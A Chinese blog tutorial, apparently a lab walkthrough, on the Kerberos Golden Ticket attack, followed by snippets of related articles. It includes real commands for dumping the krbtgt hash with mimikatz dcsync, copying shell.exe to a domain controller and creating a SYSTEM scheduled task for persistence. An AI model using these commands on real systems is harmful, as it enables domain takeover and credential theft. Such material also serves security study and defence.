黄金票据的原理和使用

已于 2022-09-28 22:46:26 修改
阅读量1.6k 收藏 4
点赞数
分类专栏: 渗透 文章标签: windows 网络安全
于 2022-09-28 22:36:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45455136/article/details/127001039
版权

黄金票据的原理和使用

krbtgt用户是系统在创建域时自动生成的账号,密码是随机生成的,无法登录主机,是KDC(密钥分发中心)的服务账号。在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的

黄金票据(Golden Ticket)原理

TGT票据加密使用的TGS(票据授予服务器)密码就是krbtgt用户的NTLM Hash

  • Kerberos中的TGT和CT_SK是AS(认证服务器)返回的,TGT是由krbtgt加密和签名的,krbtgt的NTLM Hash是固定的,CT_SK不会保存在KDC中
  • 得到krbtgt的NTLM Hash就可以伪造TGT和CT_SK,跳过AS验证

黄金票据的使用

  1. 控制了DC域控和域内主机WIN7
    在这里插入图片描述
  2. 获取域名称,hack.com
    在这里插入图片描述获取域SID值(末尾500代表是管理员)
    在这里插入图片描述
    获取域krbtgt账号的NTLM Hash
    mimikatz lsadump::dcsync /domain:hack.com /user:krbtgt
    在这里插入图片描述
  3. 后门被清理,域控下线
    在这里插入图片描述
    尝试查看域控的c盘,没有权限
    在这里插入图片描述
  4. 制作黄金票据
    在这里插入图片描述
    在这里插入图片描述
    再查看域控的c盘,有权限查看
    在这里插入图片描述
  5. copy恶意文件到域控c盘
    shell copy c:\Users\Administrator\Desktop\shell.exe \dc.hack.com\c$
    在这里插入图片描述
    给域控设置计划任务test,以system权限执行
    shell schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\shell.exe /ru system /f
    在这里插入图片描述
    运行计划任务后,cs重新上线域控
    在这里插入图片描述
黄金票据原理制作与利用
G3et的博客
01-14 698
1、用域管理运行mimikatz抓取完所需的东西 ==> 再到域用户机器上运行伪造票据。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据使用的过程需要域控通信****加粗样式。
域权限维持—黄金票据白金票据
lza20001103的博客
09-26 1503
黄金票据白金票据 前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiwi)进行了演示,该演讲提出了Kerberos协议实现过程中的设计逻辑缺陷,也就是说Windows所有使用Kerberos的场景中都可以进行此类攻击 一、Kerberos协议 首先了解下Kerberos协议,windows域认证常用协议,也是黄金票据白银票据的攻击场景 大致流程如下:
黄金票据(Golden Ticket)的原理与实践
weixin_30894583的博客
07-19 2503
0、黄金票据是什么? 在与认证过程中,经过client与AS的通信会得到TGT,带着TGT想TGS请求,得到票据ticket,用这个ticket可以来访问应用服务器。如果这段有什么疑问,欢迎参考Kerberos认证协议分析。而这个黄金票据就是自己生成的TGT,在生成TGT的过程中,user、domain、timestamp、还有权限等信息会经过krbtgt(该账号不自动更新)账户hash的加密,...
内网渗透初探 | 小白简单学习内网渗透
bdfcfff77fa的博客
02-10 882
原文作者:ajie原文地址:https://xz.aliyun.com/t/104390x01 基础知识内网渗透,从字面上理解便是对目标服务器所在内网进行渗透并最终获取域控权限的一种渗透。内网渗透的前提需要获取一个Webshell,可以是低权限的Webshell,因为可以通过提权获取高权限。在进行内网渗透之前需要了解一个概念,域环境。在内网中,往往可能存在几百上千台机器,例如需要对机器进行升级、打补丁、设置权限等,管理员不可能一台一台地更新修改。因此便衍生出了域环境。
黄金票据的制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1169
0x01黄金票据原理条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤12)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密签名的。TGT仅用...
黄金票据~
Y22Lee的博客
06-04 1323
这里大家肯定有点矛盾,我既然都可以获取krbtgt,我直接使用域中的机器进行PTT就可以了,为什么还要用工作组中的机器(如果域中的机器有杀软呢?黄金票据的制作有多种方式,黄金票据本质上是伪造TGT,既然是伪造所以在任何电脑上都可以伪造,生成的TGT票据就可以打入内存(PTT),从而实现对整个域的控制,接下来我们看一下如何伪造。黄金票据一般是伪造的TGT,生成这个TGT,不需要KDC进行校验,金票可以在本地直接生成,生成的的金票在非域机器域内机器都可以使用。第三步:获取伪造TGT使用的域SID域名。
黄金票据制作原理及利用方式
Happy峰
09-23 3058
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGTLogon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
Kerberos认证以及黄金票据白银票据的简单介绍
Reset
08-21 1203
Kerberos是一种网络身份认证的协议,协议设计目的是通过使用秘钥加密技术为客户端/服务器应用程序提供强身份验证,保护服务器防止错误的用户使用,同时保护它的用户使用正确的服务器,即支持双向验证。Kerberos协议的整个认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意的读取、修改插入数据。简而言之,Kerberos作为一种可信任的第三方认证服务,通过传统的密码技术(共享密钥)执行认证服务。
网络安全内存马与票据攻击原理及检测:Java内存马、黄金票据、白银票据、CS与Msf流量特征分析
最新发布
04-18
内容概要:本文详细介绍了多种网络安全威胁及其检测方法,包括内存马、黄金票据白银票据、...此外,对于某些复杂的攻击手段,如内存马、黄金票据等,建议深入研究其背后的原理技术细节,以提高应对复杂攻击的能力。
域权限维持——黄金票据白金票据
cxrpty的博客
04-03 2068
获得域控得用户密码时,为了防止密码被改,需要进行权限维持 实验一:黄金票据 实验原理:ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 实验条件: 1.域名称 2.域的SID 值 3.域的KRBTGT账户NTLM密码哈希或者aes-256值 4.伪造...
演示黄金票据使用普通账户导入黄金票据创建域管理员
m0_46390077的博客
01-26 292
我要是用本地用户,本地用户拿的票告诉我们这个TGS服务说我是域管账户administrator(需要拿到域用户的哈希)前提域搭建好了,域名是lin.com。首先我进入的是本机的用户不是域用户。加入domain说明要操作域用户了。使用管理员身份进入启动工具。进入window 7 中。
内网渗透--黄金票据
yc的博客
05-23 1899
域渗透-----黄金票据使用 前言 今天主要学习内容为黄金票据的制作,黄金票据主要是权限维持,因为经验少,所以一直不明白一个问题,就是在制作黄金票据时候需要KRBTGT的hash,KRBTGT的hash需要域控权限,而且每张黄金票据制作后仅可维持十个小时,那么黄金票据的主要作用是什么?是hw时管理员突然改域控密码,此时黄金票据可以维持权限、继续渗透嘛? Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密签名的。TGT仅用于向域控制器上的KD
PTT之黄金票据
m0_58606546的博客
11-20 301
3.1:黄金票据原理 在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个Session key_ASTGT,而Session key_AS并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash(也就是KDC hash),就可以伪造TGTSession key_AS来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户密码,所以也不担心域管密码修改。因为krbtgt只有域控
域渗透:黄金票据
ClarkAlbert的博客
10-29 1725
域渗透:黄金票据前言:1.黄金票据原理条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows域中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据原理条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
内网渗透-(黄金票据白银票据)详解(一)
duoba_an的博客
03-31 2768
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
黄金票据——域渗透
include_voidmain的博客
03-14 739
0x01前言 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。攻击者一旦拿到域管权限的账号就可以伪造出黄金票据,逃过账号密码的验证,即使修改管理员密码,攻击者依然能通过黄金票据进行访问。 0x02原理 kerberos认证中Client通过AS认证后,AS会给Client一个由Client的Master Key加密过的TGT,Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到NTLM就能伪造TGTLogon session key,
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 4577
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
内网渗透--Golden Ticket(黄金票据)制作&利用
qq_62169455的博客
01-17 2394
伪造TGT,不需要KDC进行校验,金票可以直接在本地生成,在域内机器非域内机器都可以使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值